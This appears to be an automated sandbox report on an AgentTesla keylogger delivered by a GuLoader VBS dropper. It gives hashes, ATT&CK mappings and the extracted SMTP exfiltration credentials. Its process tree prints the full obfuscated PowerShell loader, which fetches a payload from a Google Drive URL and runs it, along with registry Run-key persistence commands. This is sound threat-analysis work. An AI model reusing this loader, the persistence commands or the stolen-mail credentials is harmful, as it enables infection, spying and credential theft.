agenttesla | d5ff5e2daa191c35c06516f89b81bc682e7ac53bdfaea3ede48e84191532f375

Analysis

max time kernel
141s
max time network
138s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26/03/2024, 12:45

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2023072401 DataMarch.vbs
Size

166KB
MD5

f4b9002a475115cb909549d539b624bd
SHA1

936174112283c206af454063673e4a068328e85b
SHA256

d5ff5e2daa191c35c06516f89b81bc682e7ac53bdfaea3ede48e84191532f375
SHA512

0013db6fdc1d0d7b7614ca639eb0f698a6cce2687eb99bfa22536b6b6731ba5c942ba57209d18c33017f6ea9ea62bad7ccb43be5d1add018713ec2d12cd8ac69
SSDEEP

3072:1pK6/PeadLaz+kxSzn9Lj7rZeqGbHfNcckB+HGuG5Elx7d5czQON8DyRQe2:1pKyPeadLaz+k0zn1j7rZeqGbHfNccku

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
0nVaQweHLu8RyVL
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1740	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Forretningsforbindelser% -w 1 $Ydelsesforpligtelsernes=(Get-ItemProperty -Path 'HKCU:\\Administrerbarere\\').Hank;%Forretningsforbindelser% ($Ydelsesforpligtelsernes)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\FTSKIaM = "C:\\Users\\Admin\\AppData\\Roaming\\FTSKIaM\\FTSKIaM.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
14	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	api.ipify.org
22	ip-api.com
20	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1448	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1624	powershell.exe
1448	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1624 set thread context of 1448	1624	powershell.exe	33

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3024	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2624	powershell.exe
1624	powershell.exe
1448	wab.exe
1448	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1624	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	1448	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1448	wab.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1740 wrote to memory of 2624	1740	WScript.exe	29
PID 1740 wrote to memory of 2624	1740	WScript.exe	29
PID 1740 wrote to memory of 2624	1740	WScript.exe	29
PID 2624 wrote to memory of 1624	2624	powershell.exe	32
PID 2624 wrote to memory of 1624	2624	powershell.exe	32
PID 2624 wrote to memory of 1624	2624	powershell.exe	32
PID 2624 wrote to memory of 1624	2624	powershell.exe	32
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1624 wrote to memory of 1448	1624	powershell.exe	33
PID 1448 wrote to memory of 1752	1448	wab.exe	34
PID 1448 wrote to memory of 1752	1448	wab.exe	34
PID 1448 wrote to memory of 1752	1448	wab.exe	34
PID 1448 wrote to memory of 1752	1448	wab.exe	34
PID 1752 wrote to memory of 3024	1752	cmd.exe	36
PID 1752 wrote to memory of 3024	1752	cmd.exe	36
PID 1752 wrote to memory of 3024	1752	cmd.exe	36
PID 1752 wrote to memory of 3024	1752	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2023072401 DataMarch.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Septicaemia;++$Septicaemia;$Septicaemia=$Septicaemia-1;Function poleremidlets ($Borrises){$Kilotonnets=5;$Kilotonnets++;For($Pimas=5; $Pimas -lt $Borrises.Length-1; $Pimas+=$Kilotonnets){$chefsekretrens = 'substring';$Tjhuse=$Borrises.$chefsekretrens.Invoke($Pimas, 1);$Inidoneous=$Inidoneous+$Tjhuse}$Inidoneous;}$Webstedet=poleremidlets ' UnarhSkrpntVandit FirkpFod osMukke:m tho/Skmte/Stopsd M,ddrCheyniwatervBrolgemarco. Lullg SeksoDelegoDruesgV lvilErythe Maal.T.polcOutshoKarolms.okk/PosituDi secOffic?SogneeInterxPassipLoa boForetrgaitet Mind=Uefabd Pi.hoOversw Bengn OrdslJ.legoRabaraSulcudEc,yc&LodoiiDatidd mich=,ornp1Ov rtXMizzlJHvileTEben cNit,oTArgumNPn umtJdiskWSkran1Sa.atEProcaMClitt8GarneKOp.atWmedic3CompuGUn erkTempo9 OthoDSal.sFFo.ni6Ab traPa asv,fkobiDottrrBere aEquipuTallo7 PythrPs udKRadiaiDi,bez Tall ';$Nerveproof=$Webstedet.split([char]62);$Webstedet=$Nerveproof[0];$Barskere=poleremidlets 'Dwyerid.gsbeMervex ,dsk ';$Borvand = poleremidlets 'Depen\SamarsTriu y eleasSchmewUdsago PorfwPtyal6 ,enn4 Unsi\ GeldWPos,kiLini,nEle.zdIntimoVandewSymphs StegP SkudoAnlbswMultieDorsirKonceS PershCelineSlumblNona.lSpeos\Bur.uvUmrke1Fil e.Spi.n0Vatte\Al,espapplioA,oniwSatt,eGldsfrmiljssSvel,hReindeOverclSplenlFo st.RulnieSygehxEf,ereBl.se ';&($Barskere) (poleremidlets 'Apo o$BrediTHejseuCor,icPreadkR.gimiBlenneE,nes=Digni$Inka,ePreounKl psvFagti:AngulwPass.iPrelinBoj.bdH.nviidownsrUnapp ') ;&($Barskere) (poleremidlets 'Amyla$TilkeBAdmiro Ce,erMu,amvUnforaSav,pnSpytkd.obbi=Eldin$moeblTStrm,u Fl.ocenwi.kCacogiSlowwe.hite+lucum$TrykfBPreaoo SkidrTe.pevAlv,raIncrenDisyodTeglv ') ;&($Barskere) (poleremidlets 'Ferie$opvinM vegeeWupged UkrabToraee jecesPhyletPereseDronnm Revem For.eAfblel B,flsshelleLagers Gald Faerd= bake Sem,s(Cosmo(Paleogsg,stwTempomTtteki.rans NoneqwH lskiIndskn Sial3ov rt2Serot_Mods pSelvsrSam.no TorsctospaeDel,lsObjecs Supp Temas-I.spiFPtero InequPUhomorHenveo kribcRnkese ,ftesTr.chsAfproIA.mond ,van=Semip$ Aila{TyresPsyllaI pierDGoffe}appen)Shall.OnstaCForsooMicromCottomOrthoaDy.kenVerdedOverpLKittiiDosednGastreFlygt)Opbyg Surm.-V ndks Lezzp,ribllMyce.iSk.altanalp Samme[ Peric W,lshDefola FinprBypla]Cine 3Legio4S yrb ');&($Barskere) (poleremidlets 'Mamme$VejrpFPurpurTegnte Gal,n PnheuRegnslGraedaMurb, Navne=ki.br Anbe$Li,anMamp.ieKh.ndd onagbGeulae A,trsDoingt FanteCrystmBil.rm Wa.sewh,gglDynams SadeeTi los Fren[udene$.orgeMUdkomeR,prid ArctbBandee Sm lsFunk tSpydge ,rofmUngovmChl.reBystalBoligsnis,eeChonisRosea.RatbacurnehoF ksiuWolfrn AmertBundk-Skimp2helbr]Hocke ');&($Barskere) (poleremidlets 'Sawai$UnsurS.othok.abbaeLokalfKemika aksebAds.rr VoldiUnwivksrget=Stan,(GrownTanagee.cales Sprit Kono-GudhePEpi ea Ec itnvntehholdn Fiber$KnudeBDataro Pastr Tor vSy,epaH,tidnNyte.dU,tyn)Bil.i Aag,r-DimenABagagnSofj,dMasse Op qu(Souly[El laImytoln.onprtNonc,PUnciatSu.lerLsrev] Frih:Antir:.yrrhssh,slire axz emibeRalli .ridp-ReddeeReverq Mus skr f8liter)Flyve ') ;if ($Skefabrik) {.$Borvand $Frenula;} else {;$Nouses=poleremidlets ' FotoSSit atHelpeaFe.lpr ItertAnsva-H,ntnBTjenei ndemtSkis sFlippTNon,erForpaaGydelnPhyllsFaujdfSundhe ,honrP eud Epica-VirkeSRds.moIarovuOver rMobi cBlaz,eVmmel Stirr$ U.inW,rndfe Supeb morps FgtetMeatie Cowed Ki,ieBe.alt ygn Ouan,-LyricDInd,eeTaskvsRestat NondiLagrenN,ninaF stltTurn iSiroco UndenStrmp Shaug$ Ih.dTYuhdouAdgancfrelskJaevni CezaeIsogr ';&($Barskere) (poleremidlets 'T,ico$UnderTFe,rsuTorumcOver.kVandliNik,ee,ugni= S.gn$AntibeusigtnEva,uv hood:.orkraSvanepAfholp Gormd Ag.na TekstIntimaL.gno ') ;&($Barskere) (poleremidlets ' ka.eI G.anmUnostpUnsheoVestirL,niktE,oxi-SprjtMSemimohjemsdAnal,uSlanklAnt deSkot DentaB,unkpiRec,atCastosServiTato erKnirkaMetapnS,inasNervefHvil e rdder Bude ') ;$Tuckie=$Tuckie+'\Slaughterman.Pro';while (-not $Champlev) {&($Barskere) (poleremidlets 'Debbi$Eag rC redsh The.aN velmAircopEventlInduceUndervActin=Potas( tartTPreoveBrighsKommat Treh-Loss Pbor.oa Kbestfer,ihPrevi Fasc$TheraTMa seumethocChic.k BipoiHypere.andl) Sk,o ') ;&($Barskere) $Nouses;&($Barskere) (poleremidlets 'UpleaSBrnektDer na OverrOverdtUnu h-KoralS Ensll Sm,leFe,rieRussepTermo Ldres5Headg ');$Webstedet=$Nerveproof[$Multivalued++%$Nerveproof.count];}&($Barskere) (poleremidlets ',hevr$ kommTShallh SnekutranssExtrahDokumiSikke Prepr=,atte WindmGSiksaeFornutForec-unexpC PaleoKathonKanapthemmeeEksplnDokumtInter P,cu$OversTR,fleuGastrcSho.akOfficiMorineResa, ');&($Barskere) (poleremidlets ' F.nk$Fa,osIQu,ltn DemovSnesceSneglsQuinot .ekre kkelrSwordiSopitnTrucigGardesGalvaffre eoGratirfundue LedsnpercoiGraasnSkindguomgne FisknVotivsCou.t7Ble,s2 J,ve tkkel=Synsk Ecos,[RaderS SulfyDa drs appotAdolpeDo bsmCh.na.AnsttCTr.itoCylinnYeomav Bie.e .drerBarbetMyrio]Fermi:Outra:MejetFGubberMaximoUromemHarmoBSlg saLanessShedte Kuty6Misi,4 SlavSAllegtHematrTroldiTailonPaaskg Bilb(Non,i$HyrdeTSemichEme,iu PrinsBedsthMutuaiCasan)sacra ');&($Barskere) (poleremidlets 'Gymna$SkridSGro,gastjplnUdgyddAntiph.ntimoIteacgKontisIndho B os=Kursi rem.[Unki,SD.lagyJovias Ti.jtRnkefe Me smGenne. F uvTSpl,neSkydexRetintKnock.lyspuEAllicnFalsecAgyioo A.uld tikvi.vrganf,congJeewh]Jutti:Ple,i:NdvenAMasteSHypoeCBesquISkalaI B,ev.Salu,G Fl meSquatt,jordSBilletBogierD.mokiHerlin a.vrg Brum(My,hu$ S,clIkingsn Tr,av .pbreS,robs DacttmandoeSepharSvarsiHaberngism,g,nsposTriadfPsykooMeredrsoixae BournbeskeiVedhonEquilgalka.e vovln Ref,sPrima7Meato2Salva) De,o ');&($Barskere) (poleremidlets ' ober$Decedr A,ree SluttPlectt TennrVe,meoAmp.leSqualnFrdsedTeleae Grees Rest=Dotte$MiljzSSlagtaNo,manSagsrd,ingeh Una oKlamhg Ph rsi,pyg.ElefasHyalouKropsbSemipsAdarutHa serForesiSadelnNdsagg Aver(Sp,re3fabri3 Vacc4.kyde3Leves5Tredj3Grovk,Jagtf2E dop5 upe1Ge ne7Fli.e0Doede) Vira ');&($Barskere) $rettroendes;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Septicaemia;++$Septicaemia;$Septicaemia=$Septicaemia-1;Function poleremidlets ($Borrises){$Kilotonnets=5;$Kilotonnets++;For($Pimas=5; $Pimas -lt $Borrises.Length-1; $Pimas+=$Kilotonnets){$chefsekretrens = 'substring';$Tjhuse=$Borrises.$chefsekretrens.Invoke($Pimas, 1);$Inidoneous=$Inidoneous+$Tjhuse}$Inidoneous;}$Webstedet=poleremidlets ' UnarhSkrpntVandit FirkpFod osMukke:m tho/Skmte/Stopsd M,ddrCheyniwatervBrolgemarco. Lullg SeksoDelegoDruesgV lvilErythe Maal.T.polcOutshoKarolms.okk/PosituDi secOffic?SogneeInterxPassipLoa boForetrgaitet Mind=Uefabd Pi.hoOversw Bengn OrdslJ.legoRabaraSulcudEc,yc&LodoiiDatidd mich=,ornp1Ov rtXMizzlJHvileTEben cNit,oTArgumNPn umtJdiskWSkran1Sa.atEProcaMClitt8GarneKOp.atWmedic3CompuGUn erkTempo9 OthoDSal.sFFo.ni6Ab traPa asv,fkobiDottrrBere aEquipuTallo7 PythrPs udKRadiaiDi,bez Tall ';$Nerveproof=$Webstedet.split([char]62);$Webstedet=$Nerveproof[0];$Barskere=poleremidlets 'Dwyerid.gsbeMervex ,dsk ';$Borvand = poleremidlets 'Depen\SamarsTriu y eleasSchmewUdsago PorfwPtyal6 ,enn4 Unsi\ GeldWPos,kiLini,nEle.zdIntimoVandewSymphs StegP SkudoAnlbswMultieDorsirKonceS PershCelineSlumblNona.lSpeos\Bur.uvUmrke1Fil e.Spi.n0Vatte\Al,espapplioA,oniwSatt,eGldsfrmiljssSvel,hReindeOverclSplenlFo st.RulnieSygehxEf,ereBl.se ';&($Barskere) (poleremidlets 'Apo o$BrediTHejseuCor,icPreadkR.gimiBlenneE,nes=Digni$Inka,ePreounKl psvFagti:AngulwPass.iPrelinBoj.bdH.nviidownsrUnapp ') ;&($Barskere) (poleremidlets 'Amyla$TilkeBAdmiro Ce,erMu,amvUnforaSav,pnSpytkd.obbi=Eldin$moeblTStrm,u Fl.ocenwi.kCacogiSlowwe.hite+lucum$TrykfBPreaoo SkidrTe.pevAlv,raIncrenDisyodTeglv ') ;&($Barskere) (poleremidlets 'Ferie$opvinM vegeeWupged UkrabToraee jecesPhyletPereseDronnm Revem For.eAfblel B,flsshelleLagers Gald Faerd= bake Sem,s(Cosmo(Paleogsg,stwTempomTtteki.rans NoneqwH lskiIndskn Sial3ov rt2Serot_Mods pSelvsrSam.no TorsctospaeDel,lsObjecs Supp Temas-I.spiFPtero InequPUhomorHenveo kribcRnkese ,ftesTr.chsAfproIA.mond ,van=Semip$ Aila{TyresPsyllaI pierDGoffe}appen)Shall.OnstaCForsooMicromCottomOrthoaDy.kenVerdedOverpLKittiiDosednGastreFlygt)Opbyg Surm.-V ndks Lezzp,ribllMyce.iSk.altanalp Samme[ Peric W,lshDefola FinprBypla]Cine 3Legio4S yrb ');&($Barskere) (poleremidlets 'Mamme$VejrpFPurpurTegnte Gal,n PnheuRegnslGraedaMurb, Navne=ki.br Anbe$Li,anMamp.ieKh.ndd onagbGeulae A,trsDoingt FanteCrystmBil.rm Wa.sewh,gglDynams SadeeTi los Fren[udene$.orgeMUdkomeR,prid ArctbBandee Sm lsFunk tSpydge ,rofmUngovmChl.reBystalBoligsnis,eeChonisRosea.RatbacurnehoF ksiuWolfrn AmertBundk-Skimp2helbr]Hocke ');&($Barskere) (poleremidlets 'Sawai$UnsurS.othok.abbaeLokalfKemika aksebAds.rr VoldiUnwivksrget=Stan,(GrownTanagee.cales Sprit Kono-GudhePEpi ea Ec itnvntehholdn Fiber$KnudeBDataro Pastr Tor vSy,epaH,tidnNyte.dU,tyn)Bil.i Aag,r-DimenABagagnSofj,dMasse Op qu(Souly[El laImytoln.onprtNonc,PUnciatSu.lerLsrev] Frih:Antir:.yrrhssh,slire axz emibeRalli .ridp-ReddeeReverq Mus skr f8liter)Flyve ') ;if ($Skefabrik) {.$Borvand $Frenula;} else {;$Nouses=poleremidlets ' FotoSSit atHelpeaFe.lpr ItertAnsva-H,ntnBTjenei ndemtSkis sFlippTNon,erForpaaGydelnPhyllsFaujdfSundhe ,honrP eud Epica-VirkeSRds.moIarovuOver rMobi cBlaz,eVmmel Stirr$ U.inW,rndfe Supeb morps FgtetMeatie Cowed Ki,ieBe.alt ygn Ouan,-LyricDInd,eeTaskvsRestat NondiLagrenN,ninaF stltTurn iSiroco UndenStrmp Shaug$ Ih.dTYuhdouAdgancfrelskJaevni CezaeIsogr ';&($Barskere) (poleremidlets 'T,ico$UnderTFe,rsuTorumcOver.kVandliNik,ee,ugni= S.gn$AntibeusigtnEva,uv hood:.orkraSvanepAfholp Gormd Ag.na TekstIntimaL.gno ') ;&($Barskere) (poleremidlets ' ka.eI G.anmUnostpUnsheoVestirL,niktE,oxi-SprjtMSemimohjemsdAnal,uSlanklAnt deSkot DentaB,unkpiRec,atCastosServiTato erKnirkaMetapnS,inasNervefHvil e rdder Bude ') ;$Tuckie=$Tuckie+'\Slaughterman.Pro';while (-not $Champlev) {&($Barskere) (poleremidlets 'Debbi$Eag rC redsh The.aN velmAircopEventlInduceUndervActin=Potas( tartTPreoveBrighsKommat Treh-Loss Pbor.oa Kbestfer,ihPrevi Fasc$TheraTMa seumethocChic.k BipoiHypere.andl) Sk,o ') ;&($Barskere) $Nouses;&($Barskere) (poleremidlets 'UpleaSBrnektDer na OverrOverdtUnu h-KoralS Ensll Sm,leFe,rieRussepTermo Ldres5Headg ');$Webstedet=$Nerveproof[$Multivalued++%$Nerveproof.count];}&($Barskere) (poleremidlets ',hevr$ kommTShallh SnekutranssExtrahDokumiSikke Prepr=,atte WindmGSiksaeFornutForec-unexpC PaleoKathonKanapthemmeeEksplnDokumtInter P,cu$OversTR,fleuGastrcSho.akOfficiMorineResa, ');&($Barskere) (poleremidlets ' F.nk$Fa,osIQu,ltn DemovSnesceSneglsQuinot .ekre kkelrSwordiSopitnTrucigGardesGalvaffre eoGratirfundue LedsnpercoiGraasnSkindguomgne FisknVotivsCou.t7Ble,s2 J,ve tkkel=Synsk Ecos,[RaderS SulfyDa drs appotAdolpeDo bsmCh.na.AnsttCTr.itoCylinnYeomav Bie.e .drerBarbetMyrio]Fermi:Outra:MejetFGubberMaximoUromemHarmoBSlg saLanessShedte Kuty6Misi,4 SlavSAllegtHematrTroldiTailonPaaskg Bilb(Non,i$HyrdeTSemichEme,iu PrinsBedsthMutuaiCasan)sacra ');&($Barskere) (poleremidlets 'Gymna$SkridSGro,gastjplnUdgyddAntiph.ntimoIteacgKontisIndho B os=Kursi rem.[Unki,SD.lagyJovias Ti.jtRnkefe Me smGenne. F uvTSpl,neSkydexRetintKnock.lyspuEAllicnFalsecAgyioo A.uld tikvi.vrganf,congJeewh]Jutti:Ple,i:NdvenAMasteSHypoeCBesquISkalaI B,ev.Salu,G Fl meSquatt,jordSBilletBogierD.mokiHerlin a.vrg Brum(My,hu$ S,clIkingsn Tr,av .pbreS,robs DacttmandoeSepharSvarsiHaberngism,g,nsposTriadfPsykooMeredrsoixae BournbeskeiVedhonEquilgalka.e vovln Ref,sPrima7Meato2Salva) De,o ');&($Barskere) (poleremidlets ' ober$Decedr A,ree SluttPlectt TennrVe,meoAmp.leSqualnFrdsedTeleae Grees Rest=Dotte$MiljzSSlagtaNo,manSagsrd,ingeh Una oKlamhg Ph rsi,pyg.ElefasHyalouKropsbSemipsAdarutHa serForesiSadelnNdsagg Aver(Sp,re3fabri3 Vacc4.kyde3Leves5Tredj3Grovk,Jagtf2E dop5 upe1Ge ne7Fli.e0Doede) Vira ');&($Barskere) $rettroendes;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forretningsforbindelser% -w 1 $Ydelsesforpligtelsernes=(Get-ItemProperty -Path 'HKCU:\Administrerbarere\').Hank;%Forretningsforbindelser% ($Ydelsesforpligtelsernes)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1752
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forretningsforbindelser% -w 1 $Ydelsesforpligtelsernes=(Get-ItemProperty -Path 'HKCU:\Administrerbarere\').Hank;%Forretningsforbindelser% ($Ydelsesforpligtelsernes)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:3024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8252ffb581acf6f0b2dc01c34ecb97f8

SHA1
22bee7eb4d0cac8257054757bbb5980deca2abbf

SHA256
23e646939770a9be1e2da1942d209752cca7b31642423a00671498948878e9b2

SHA512
182638a5045f470af516ba1a19d6bafb59c7826687187ace36d216d4cf20bfdd7502610b0578b5dd533442ec947dd828b103a44a3e0ef140afbed1acf4abd970

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7a636111518aaa809c56f03f5690ad3c

SHA1
9ecc1e39fb1521f61a9602486a262ac0487f5d7c

SHA256
7385031c073f253614538dedb839a2b583ed932d6bce319d7ca52606ca21b1ef

SHA512
ae0dc8b58856d525a3248f48850730d3f914e68428193e39d8e9983060543f0540833e95f9ffe78210972f664469417b33c7161d803070f29b8ab559169ac4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab46B1.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF384.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0AKXAXCFYDXO81AKDG43.temp

Filesize
7KB

MD5
fc671cadfa02ae1e27301dd3bdc13b83

SHA1
defcf7a759eca4683d064329f4b12a281dd788ec

SHA256
2b3b16a6a87b139661a4aa6bb2e8e862aca61e30e471b562f32673070a85de20

SHA512
25abda6da846039a2cdf42f16ee81e6cbf9c8de6ea7ce626bc8ef6a7ff63155ec887bfdc98e04d137632c431f819a014ba1d8692ca1ed580c0ffb0fc0b56c568

Download Submit
memory/1448-100-0x000000006ED70000-0x000000006F45E000-memory.dmp

Filesize
6.9MB

Download
memory/1448-95-0x00000000774E0000-0x00000000775B6000-memory.dmp

Filesize
856KB

Download
memory/1448-94-0x00000000004F0000-0x0000000001552000-memory.dmp

Filesize
16.4MB

Download
memory/1448-99-0x00000000004F0000-0x0000000000532000-memory.dmp

Filesize
264KB

Download
memory/1448-86-0x0000000001560000-0x0000000003038000-memory.dmp

Filesize
26.8MB

Download
memory/1448-61-0x0000000001560000-0x0000000003038000-memory.dmp

Filesize
26.8MB

Download
memory/1448-101-0x000000001FC20000-0x000000001FC60000-memory.dmp

Filesize
256KB

Download
memory/1448-68-0x00000000004F0000-0x0000000001552000-memory.dmp

Filesize
16.4MB

Download
memory/1448-106-0x000000006ED70000-0x000000006F45E000-memory.dmp

Filesize
6.9MB

Download
memory/1448-107-0x000000001FC20000-0x000000001FC60000-memory.dmp

Filesize
256KB

Download
memory/1448-65-0x0000000077516000-0x0000000077517000-memory.dmp

Filesize
4KB

Download
memory/1448-66-0x00000000774E0000-0x00000000775B6000-memory.dmp

Filesize
856KB

Download
memory/1448-64-0x00000000772F0000-0x0000000077499000-memory.dmp

Filesize
1.7MB

Download
memory/1624-34-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/1624-58-0x0000000006A80000-0x0000000008558000-memory.dmp

Filesize
26.8MB

Download
memory/1624-51-0x0000000073190000-0x000000007373B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-52-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/1624-53-0x0000000006A80000-0x0000000008558000-memory.dmp

Filesize
26.8MB

Download
memory/1624-55-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/1624-54-0x0000000073190000-0x000000007373B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-57-0x00000000058A0000-0x00000000058A1000-memory.dmp

Filesize
4KB

Download
memory/1624-56-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/1624-33-0x0000000073190000-0x000000007373B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-59-0x00000000772F0000-0x0000000077499000-memory.dmp

Filesize
1.7MB

Download
memory/1624-60-0x00000000774E0000-0x00000000775B6000-memory.dmp

Filesize
856KB

Download
memory/1624-97-0x0000000073190000-0x000000007373B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-96-0x0000000006A80000-0x0000000008558000-memory.dmp

Filesize
26.8MB

Download
memory/1624-31-0x0000000073190000-0x000000007373B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-32-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/1624-67-0x0000000006A80000-0x0000000008558000-memory.dmp

Filesize
26.8MB

Download
memory/2624-46-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2624-22-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2624-50-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-47-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-28-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-27-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-48-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-49-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-26-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-98-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2624-25-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2624-23-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2624-24-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/2624-21-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download